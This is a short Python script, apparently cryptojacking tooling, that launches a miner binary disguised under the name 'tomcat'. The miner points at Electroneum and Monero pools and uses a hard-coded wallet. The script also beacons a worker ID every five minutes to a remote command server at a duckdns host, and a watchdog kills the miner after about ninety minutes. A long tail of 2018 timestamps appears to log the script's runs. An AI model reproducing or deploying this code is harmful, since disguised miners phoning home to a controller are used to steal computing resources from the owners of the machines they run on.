import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:51:06.501848
#2018-02-17 17:38:06.061499
#2018-02-17 19:25:07.838711
#2018-02-17 21:15:07.769349
#2018-02-17 23:00:04.955065
#2018-02-18 00:46:05.249782
#2018-02-18 02:35:05.399521
#2018-02-18 04:22:03.776469
#2018-02-18 06:12:07.201086
#2018-02-18 08:02:06.511272
#2018-02-18 09:50:04.558711
#2018-02-18 11:37:03.416477
#2018-02-18 13:22:03.321395
#2018-02-18 15:12:05.583567
#2018-02-18 17:01:01.473588
#2018-02-18 18:48:01.286858
#2018-02-18 20:35:03.718543
#2018-02-18 22:21:03.596395
#2018-02-19 00:10:07.258894
#2018-02-19 01:58:01.284351
#2018-02-19 03:45:07.778363
#2018-02-19 05:31:07.159718
#2018-02-19 07:19:04.203984
#2018-02-19 09:08:07.396849
#2018-02-19 10:57:04.737635
#2018-02-19 12:44:05.339431
#2018-02-19 14:32:04.236675
#2018-02-19 16:21:05.967760
#2018-02-19 18:08:05.906781
#2018-02-19 19:56:01.364946
#2018-02-19 21:43:04.020397
#2018-02-19 23:29:01.681624
#2018-02-20 01:16:01.191582
#2018-02-20 03:06:07.309740
#2018-02-20 04:53:06.042241
#2018-02-20 06:36:02.076696
#2018-02-20 08:21:06.251702
#2018-02-20 10:06:04.837379
#2018-02-20 11:50:09.161433
#2018-02-20 13:38:01.514472
#2018-02-20 15:24:07.797750
#2018-02-20 17:09:07.776216
#2018-02-20 18:59:04.685190
#2018-02-20 20:48:04.875742
#2018-02-20 22:32:07.984785
#2018-02-21 00:14:01.660209
#2018-02-21 02:01:04.036221
#2018-02-21 03:49:02.045838
#2018-02-21 05:36:05.656058
#2018-02-21 07:23:04.360676
#2018-02-21 09:07:04.891613
#2018-02-21 10:55:06.141487
#2018-02-21 12:42:08.198789
#2018-02-21 14:31:07.852707
#2018-02-21 16:17:07.024960
#2018-02-21 18:06:01.413258
#2018-02-21 19:52:08.268707
#2018-02-21 21:37:08.281695
#2018-02-21 23:23:06.072491
#2018-02-22 01:11:05.317760
#2018-02-22 03:01:06.729548
#2018-02-22 04:47:05.211111
#2018-02-22 06:31:08.122491
#2018-02-22 08:19:02.129782
#2018-02-22 10:08:03.923002
#2018-02-22 11:52:11.912762
#2018-02-22 13:38:07.957473
#2018-02-22 15:26:09.166519
#2018-02-22 17:13:02.067245
#2018-02-22 18:58:09.699735
#2018-02-22 20:51:01.444885
#2018-02-22 22:36:06.254774
#2018-02-23 00:23:04.951402
#2018-02-23 02:10:04.034804
#2018-02-23 04:01:04.273135
#2018-02-23 05:48:06.579856
#2018-02-23 07:38:05.411280
#2018-02-23 09:41:05.987493
#2018-02-23 11:47:01.701228
#2018-02-23 13:36:07.507408
#2018-02-23 15:23:06.710899
#2018-02-23 17:12:05.566262
#2018-02-23 18:57:05.762149
#2018-02-23 20:45:10.697000
#2018-02-23 22:34:01.730616
#2018-02-24 00:20:09.910749
#2018-02-24 02:12:08.254544
#2018-02-24 04:01:05.316577
#2018-02-24 05:46:07.851839
#2018-02-24 07:33:07.112406
#2018-02-24 09:20:05.520126
#2018-02-24 11:13:05.044900
#2018-02-24 13:02:07.404850
#2018-02-24 14:49:01.797611
#2018-02-24 16:41:06.756042
#2018-02-24 18:29:07.991555
#2018-02-24 20:16:06.034321
#2018-02-24 22:08:01.823392
#2018-02-25 01:06:04.870467
#2018-02-25 04:37:02.016126
#2018-02-25 08:02:06.477071